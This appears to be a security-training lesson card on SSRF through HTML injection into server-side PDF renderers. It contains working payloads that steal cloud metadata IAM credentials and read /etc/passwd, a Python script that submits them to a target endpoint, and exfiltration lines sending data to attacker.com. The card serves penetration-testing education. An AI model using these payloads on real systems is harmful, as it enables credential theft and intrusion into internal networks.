SSRF via PDF Renderer: Headless Browser Exploitation for Internal Service Access via HTML Injection

web_injection_logic Difficulty 1–5 30 min certifiable

Theory

Security Assessment Methodology

Headless browser and PDF renderer services — wkhtmltopdf, Puppeteer, Headless Chrome, PhantomJS, WeasyPrint, Prince — accept user-supplied HTML or URLs and render them server-side. When an attacker can influence the HTML that is rendered, the renderer becomes an SSRF proxy: any network request or local file read that the browser engine can perform is also accessible to the attacker.

Renderer identification. The PDF's metadata often reveals the renderer. In most PDF viewers, File > Properties > Description shows the Producer field. On the command line:

pdfinfo report.pdf | grep -E "^(Producer|Creator)"
exiftool report.pdf | grep -E "(PDF Producer|Creator Tool)"

Common values: wkhtmltopdf 0.12.6, Chromium 108.0.5359.124, PhantomJS 2.1.1. The renderer version matters: older versions of wkhtmltopdf (< 0.12.6) support file:// and http:// URIs in <img>, <iframe>, and CSS without restriction; newer versions partially sandbox these.

Injection vectors:

<iframe src="http://169.254.169.254/latest/meta-data/"> — the renderer fetches the metadata endpoint and includes its content in the rendered frame. The attacker reads the iframe content from the PDF output or from a JavaScript exfiltration callback.
<script>fetch('http://internal-api/secret').then(r=>r.text()).then(t=>{ document.write(t) })</script> — JavaScript fetch to an internal endpoint; the response body is written into the document and appears in the rendered PDF. Works in Puppeteer/Headless Chrome; wkhtmltopdf supports JavaScript but has a limited fetch API.
<img src="file:///etc/passwd"> — local file read via file:// URI scheme. In wkhtmltopdf, a broken-image placeholder may appear (the file content is not inlined), but the renderer's network log or error output may leak the content. Better: use XMLHttpRequest or fetch with file:// if supported.
CSS @import url('http://internal/') — CSS import triggers an HTTP request; response content can leak if it is valid CSS (the attacker can detect the presence of specific CSS rules via element styling).
<link rel="stylesheet" href="http://attacker.com/log?data="> + CSS injection — if user-supplied CSS is reflected, inject a url() reference to exfiltrate data via HTTP request parameters.

Exfiltration when the PDF body is not directly readable:

Write content to the document title: document.title = secret_data — visible in the PDF metadata.
Redirect to an attacker-controlled URL encoding the data: location = 'http://attacker.com/' + btoa(secret).
Use DNS exfiltration: new Image().src = 'http://' + btoa(secret).replace(/=/g,'') + '.attacker.com/'.

Technical Deep-Dive

<!-- Payload 1: iframe metadata fetch (wkhtmltopdf / Puppeteer) -->
<html><body>
<h1>Report</h1>
<iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/"
        width="800" height="400"></iframe>
</body></html>

<!-- Payload 2: JavaScript fetch + document.write (Puppeteer / Headless Chrome) -->
<html><body>
<div id="out"></div>
<script>
fetch('http://169.254.169.254/latest/meta-data/iam/security-credentials/')
  .then(r => r.text())
  .then(role => fetch('http://169.254.169.254/latest/meta-data/iam/security-credentials/' + role.trim()))
  .then(r => r.text())
  .then(creds => { document.getElementById('out').innerText = creds; });
</script>
</body></html>

<!-- Payload 3: file read via XMLHttpRequest (wkhtmltopdf with --enable-local-file-access) -->
<html><body>
<pre id="file"></pre>
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'file:///etc/passwd', false);
xhr.send();
document.getElementById('file').innerText = xhr.responseText;
</script>
</body></html>

import requests, base64

# Submit HTML payload to a PDF generation endpoint and extract rendered content
def exploit_pdf_ssrf(
    pdf_endpoint: str,
    html_payload: str,
    param_name: str = "html",
) -> bytes:
    """Submit malicious HTML to a PDF renderer and return the raw PDF bytes."""
    resp = requests.post(pdf_endpoint, data={param_name: html_payload}, timeout=30)
    resp.raise_for_status()
    return resp.content

# Extract text from resulting PDF (requires pdfminer or pdftotext)
def extract_pdf_text(pdf_bytes: bytes) -> str:
    import io
    from pdfminer.high_level import extract_text
    return extract_text(io.BytesIO(pdf_bytes))

# Usage:
# pdf = exploit_pdf_ssrf("https://target.example.com/generate-pdf", PAYLOAD_2)
# text = extract_pdf_text(pdf)
# print(text)

# Identify renderer from PDF metadata
exiftool output.pdf | grep -E "(Producer|Creator)"
pdfinfo output.pdf

# Extract text from PDF to find SSRF output
pdftotext output.pdf - | head -50

# Test wkhtmltopdf file:// access locally (confirm renderer behaviour)
wkhtmltopdf - /tmp/test.pdf <<'EOF'
<html><body>
<script>
var x = new XMLHttpRequest();
x.open('GET', 'file:///etc/passwd', false);
x.send();
document.write('<pre>' + x.responseText + '</pre>');
</script>
</body></html>
EOF
pdftotext /tmp/test.pdf -

Common Assessment Errors

1. Not checking if JavaScript is enabled. wkhtmltopdf disables JavaScript by default in some distributions; the --enable-javascript flag (or equivalent configuration) is required. If JavaScript payloads produce no output, try non-JS vectors (iframe, img, CSS import) before concluding JavaScript is supported.

2. Assuming synchronous rendering. Puppeteer and Headless Chrome render pages asynchronously. A fetch() call may not complete before the renderer captures the PDF snapshot if waitForNetworkIdle or an adequate delay is not configured. If the PDF output is empty where dynamic content is expected, the renderer likely captured the page before the fetch resolved.

3. Missing wkhtmltopdf --allow flag. In some builds, wkhtmltopdf requires --allow <path> to permit local file access. Cloud-deployed instances often omit this flag, blocking file:// reads. Fall back to HTTP-based SSRF (iframe, img src http://) when file:// fails.

4. Ignoring PDF metadata as an exfiltration channel. When the PDF body is heavily sanitised (e.g., iframe content is not rendered visibly), the document title and author fields may still reflect injected JavaScript assignments (document.title = secret). Always inspect all PDF metadata fields, not just the body text.

5. Not testing internal hostnames vs. IP addresses. Some renderer environments have DNS configured to resolve internal hostnames (e.g., http://internal-api/) while blocking 169.254.169.254 via iptables. Enumerate internal DNS names from error messages, JavaScript source, or other leaks before concluding the metadata endpoint is unreachable.

6. Confusing SSRF via renderer with XSS. Both involve injecting HTML/JavaScript, but SSRF via renderer is a server-side issue: the payload executes in the headless browser running on the server, not in another user's browser. The impact — server-side file reads, internal network access, credential theft — is fundamentally different from stored XSS.

Challenge Lab

Reinforce your learning with a hands-on generated challenge based on this card's competency.